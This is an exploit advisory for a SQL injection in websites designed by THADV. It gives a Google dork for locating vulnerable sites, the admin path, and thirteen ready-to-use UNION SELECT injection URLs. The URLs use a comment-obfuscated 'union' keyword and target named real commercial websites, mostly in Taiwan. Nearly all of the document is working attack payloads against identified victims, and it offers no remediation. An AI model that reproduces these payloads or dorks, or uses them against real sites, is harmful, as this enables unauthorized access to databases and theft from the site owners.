######################
# Exploit Title : Design by THADV SQL Injection
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://thadv.com/
# Google Dork : intext:"Design by THADV" index.php?func=
# Date: 24 01 2016
# Tested On : Win 10 / Google Chrome / Mozilla Firefox
#
######################
# admin page:target/admin/
#
# demos :
# http://www.hwananfoods.com.tw/mobile/index.php?func=product&action=view&prod_id=-3+/*!50000union*/+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14--%20-
# http://www.chwm3d.com/mobile/index.php?func=product&action=view&prod_id=-3+/*!50000union*/+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14--%20-
# http://oiltea.com.tw/mobile/index.php?func=product&action=view&prod_id=-3+/*!50000union*/+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14--%20-
# http://lianhong.tw/mobile/index.php?func=article&action=view&art_id=-46+/*!50000union*/+select+1,2,version(),4,5,6,7,8,9--%20-
# http://meishu.com.tw/wap/index.php?func=product&action=view&prod_id=-3+/*!50000union*/+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14--%20-
# http://www.baotian.com.tw/mobile/index.php?func=product&action=view&prod_id=-3+/*!50000union*/+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14--%20-
# http://www.jhc888.com.tw/mobile/index.php?func=product&action=view&prod_id=-3+/*!50000union*/+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14--%20-
# http://chyu2.com.tw/mobile/index.php?func=product&action=view&prod_id=-3+/*!50000union*/+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14--%20-
# http://www.summerland.com.tw/mobile/index.php?func=product&action=view&prod_id=-3+/*!50000union*/+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14--%20-
# http://www.similar.com.tw/mobile/index.php?func=product&action=view&prod_id=-3+/*!50000union*/+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14--%20-
# http://hicar.imobi.tw/index.php?func=product&action=view&prod_id=-3+/*!50000union*/+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14--%20-
# http://www.thadv.com/advmobile/index.php?func=product&action=view&prod_id=-3+/*!50000union*/+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14--%20-
# http://www.117.com.tw/mobile/index.php?func=product&action=view&prod_id=-3+/*!50000union*/+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14--%20-
######################
# discovered by : modiret
######################